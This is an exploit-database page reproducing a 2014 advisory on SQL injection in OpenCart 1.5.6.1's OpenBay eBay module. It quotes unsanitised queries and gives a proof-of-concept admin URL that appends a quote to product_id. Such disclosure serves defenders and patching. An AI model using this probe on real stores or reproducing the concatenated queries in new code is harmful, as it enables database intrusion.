OpenCart - exploit.company

vendor:

OpenCart

by:

Saadat Ullah

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: OpenCart

Affected Version From: 1.5.6.1

Affected Version To: 1.5.6.1

Patch Exists: YES

Related CWE: N/A

CPE: a:opencart:opencart

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Apache/2.2.15 PHP/5.3.3

2014

OpenCart <= 1.5.6.1 SQL Injection

OpenCart suffers from multiple SQL injection vulnerabilities in ebay.php, which is more about privilege escalation as attackers may need openbay module access. Poorly coded file full of SQLi opencart/system/library/ebay.php, where product_id is used in a SQL query without being sanitized. The function is called on many locations and parameter is passed without sanitizing. In opencart/admin/controller/openbay/openbay.php, public function editLoad() is vulnerable, where $this->request->get['product_id'] is coming from GET field. Similarly, public function isEbayOrder($id) and public function getProductStockLevel($productId, $sku = '') are also vulnerable.

Mitigation:

Sanitize user input and use prepared statements to prevent SQL injection.

Source

Exploit-DB raw data:

# Exploit Title     : OpenCart <= 1.5.6.1 SQL Injection
# Date              : 2014/3/26
# Exploit Author    : Saadat Ullah ， saadi_linux@rocketmail.com
# Software Link     : http://www.opencart.com/index.php?route=download/download
                    : https://github.com/opencart
# Software web      : www.opencart.com
# Author HomePage   : http://security-geeks.blogspot.com/
# Tested on: Server : Apache/2.2.15 PHP/5.3.3

#Opencart suffers from multipe SQL injection in ebay.php the bug is more about 
privilege escalation as attacker may need openbay module access .

Poc
Poorly coded file full of SQLi opencart/system/library/ebay.php
In file opencart/system/library/ebay.php
product_id is used in a SQL query without being sanitize.

public function getEbayItemId($product_id) {
		$this->log('getEbayItemId() - Product ID: '.$product_id);

		$qry = $this->db->query("SELECT `ebay_item_id` FROM `" . DB_PREFIX . "ebay_listing` WHERE `product_id` = '".$product_id."' AND `status` = '1' LIMIT 1");
..............
Function is called on many locations and paramter is passed without santize.
In opencart\admin\controller\openbay\openbay.php
public function editLoad() {
		...
		$item_id        = $this->openbay->ebay->getEbayItemId($this->request->get['product_id']);
..............
Where $this->request->get['product_id'] comming from GET field.
Similarly More

public function isEbayOrder($id) {
		...
		$qry = $this->db->query("SELECT `comment` FROM `" . DB_PREFIX . "order_history` WHERE `comment` LIKE '[eBay Import:%]' AND `order_id` = '".$id."' LIMIT 1");

In opencart\admin\controller\extension\openbay.php
		public function ajaxOrderInfo()
		...
		if($this->openbay->ebay->isEbayOrder($this->request->get['order_id']) !== false){
..............
More
public function getProductStockLevel($productId, $sku = '') {
		...
		$qry = $this->db->query("SELECT `quantity`, `status` FROM `" . DB_PREFIX . "product` WHERE `product_id` = '".$productId."' LIMIT 1");
..............
ebay.php has many more..
User should have openbay module access
http://localhost/opencart/admin/index.php?route=openbay/openbay/editLoad&token=5750af85a1d913aded2f6e2128616cb3&product_id=1'

#Independent Pakistani Security Researcher